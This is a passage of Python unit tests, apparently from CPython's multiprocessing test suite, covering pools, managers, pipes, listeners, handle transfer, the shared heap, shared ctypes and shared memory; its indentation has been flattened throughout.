# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_enter(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
with pool:
pass
# call pool.terminate()
# pool is no longer running
with self.assertRaises(ValueError):
# bpo-35477: pool.__enter__() fails if the pool is not running
with pool:
pass
pool.join()
def test_resource_warning(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
pool.terminate()
pool.join()
# force state to RUN to emit ResourceWarning in __del__()
pool._state = multiprocessing.pool.RUN
with support.check_warnings(('unclosed running multiprocessing pool',
ResourceWarning)):
pool = None
support.gc_collect()
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# If the manager process exited cleanly then the exitcode
# will be zero. Otherwise (after a short timeout)
# terminate() is used, resulting in an exitcode of -SIGTERM.
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle by now. This causes
# ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.create_server((test.support.HOST, 0))
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test free'ing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
@unittest.skipUnless(HAS_SHMEM, "requires multiprocessing.shared_memory")
class _TestSharedMemory(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@staticmethod
def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
if isinstance(shmem_name_or_obj, str):
local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
else:
local_sms = shmem_name_or_obj
local_sms.buf[:len(binary_data)] = binary_data
local_sms.close()
def test_shared_memory_basics(self):
sms = shared_memory.SharedMemory('test01_tsmb', create=True, size=512)
self.addCleanup(sms.unlink)
# Verify attributes are readable.
self.assertEqual(sms.name, 'test01_tsmb')
self.assertGreaterEqual(sms.size, 512)
self.assertGreaterEqual(len(sms.buf), sms.size)
# Modify contents of shared memory segment through memoryview.
sms.buf[0] = 42
self.assertEqual(sms.buf[0], 42)
# Attach to existing shared memory segment.
also_sms = shared_memory.SharedMemory('test01_tsmb')
self.assertEqual(also_sms.buf[0], 42)
also_sms.close()
# Attach to existing shared memory segment but specify a new size.
same_sms = shared_memory.SharedMemory('test01_tsmb', size=20*sms.size)
self.assertLess(same_sms.size, 20*sms.size) # Size was ignored.
same_sms.close()
# Creating Shared Memory Segment with -ve size
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=True, size=-2)
# Attaching Shared Memory Segment without a name
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=False)
# Test if shared memory segment is created properly,
# when _make_filename returns an existing shared memory segment name
with unittest.mock.patch(
'multiprocessing.shared_memory._make_filename') as mock_make_filename:
NAME_PREFIX = shared_memory._SHM_NAME_PREFIX
names = ['test01_fn', 'test02_fn']
# Prepend NAME_PREFIX which can be '/psm_' or 'wnsm_', necessary
# because some POSIX compliant systems require name to start with /
names = [NAME_PREFIX + name for name in names]
mock_make_filename.side_effect = names
shm1 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm1.unlink)
self.assertEqual(shm1._name, names[0])
mock_make_filename.side_effect = names
shm2 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm2.unlink)
self.assertEqual(shm2._name, names[1])
if shared_memory._USE_POSIX:
# Posix Shared Memory can only be unlinked once. Here we
# test an implementation detail that is not observed across
# all supported platforms (since WindowsNamedSharedMemory
# manages unlinking on its own and unlink() does nothing).
# True release of shared memory segment does not necessarily
# happen until process exits, depending on the OS platform.
with self.assertRaises(FileNotFoundError):
sms_uno = shared_memory.SharedMemory(
'test01_dblunlink',
create=True,
size=5000
)
try:
self.assertGreaterEqual(sms_uno.size, 5000)
sms_duo = shared_memory.SharedMemory('test01_dblunlink')
sms_duo.unlink() # First shm_unlink() call.
sms_duo.close()
sms_uno.close()
finally:
sms_uno.unlink() # A second shm_unlink() call is bad.
with self.assertRaises(FileExistsError):
# Attempting to create a new shared memory segment with a
# name that is already in use triggers an exception.
there_can_only_be_one_sms = shared_memory.SharedMemory(
'test01_tsmb',
create=True,
size=512
)
if shared_memory._USE_POSIX:
# Requesting creation of a shared memory segment with the option
# to attach to an existing segment, if that name is currently in
# use, should not trigger an exception.
# Note: Using a smaller size could possibly cause truncation of
# the existing segment but is OS platform dependent. In the
# case of MacOS/darwin, requesting a smaller size is disallowed.
class OptionalAttachSharedMemory(shared_memory.SharedMemory):
_flags = os.O_CREAT | os.O_RDWR
ok_if_exists_sms = OptionalAttachSharedMemory('test01_tsmb')
self.assertEqual(ok_if_exists_sms.size, sms.size)
ok_if_exists_sms.close()
# Attempting to attach to an existing shared memory segment when
# no segment exists with the supplied name triggers an exception.
with self.assertRaises(FileNotFoundError):
nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
nonexisting_sms.unlink() # Error should occur on prior line.
sms.close()
def test_shared_memory_across_processes(self):
sms = shared_memory.SharedMemory('test02_tsmap', True, size=512)
self.addCleanup(sms.unlink)
# Verify remote attachment to existing block by name is working.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms.name, b'howdy')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'howdy')
# Verify pickling of SharedMemory instance also works.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms, b'HELLO')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'HELLO')
sms.close()
@unittest.skipIf(os.name != "posix", "not feasible in non-posix platforms")
def test_shared_memory_SharedMemoryServer_ignores_sigint(self):
# bpo-36368: protect SharedMemoryManager server process from
# KeyboardInterrupt signals.
smm = multiprocessing.managers.SharedMemoryManager()
smm.start()
# make sure the manager works properly at the beginning
